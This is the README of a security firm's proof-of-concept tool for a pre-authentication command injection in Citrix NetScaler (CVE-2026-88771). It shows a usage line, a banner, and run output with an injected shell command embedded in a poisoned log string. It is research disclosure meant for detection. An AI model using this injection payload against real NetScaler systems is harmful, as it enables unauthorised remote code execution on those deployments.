用于 Citrix NetScaler CVE-2026-88771 的检测工件生成器,利用预认证命令注入对 ADC 和 Gateway 部署实现远程代码执行。
Citrix NetScaler CVE-2026-88771 检测工件生成器
技术细节请参阅我们的博客文章。
./watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py --target https://netscaler.local/ --command 'id>/var/tmp/watchTowr'
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py
(*) Citrix NetScaler PreAuth Command Injection to RCE Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-88771]
[+] connected to https://netscaler.local/
[*] payload built: pitboss PPE unexpectedly died NSPPE;id>/var/tmp/watchTowr;# X
[+] poisoning the logs...
[*] triggering force pickup...
[*] remote force pickup in progress
[*] done
命令可能需要长达 24 小时才会被拾取 此外,强制拾取技术未包含在内
所有 NetScaler ADC 和 NetScaler Gateway 部署(默认配置 / 无需额外功能)
有关受影响版本列表,请参阅 Citrix 官方公告。
获取最新安全研究,请关注 watchTowr Labs 团队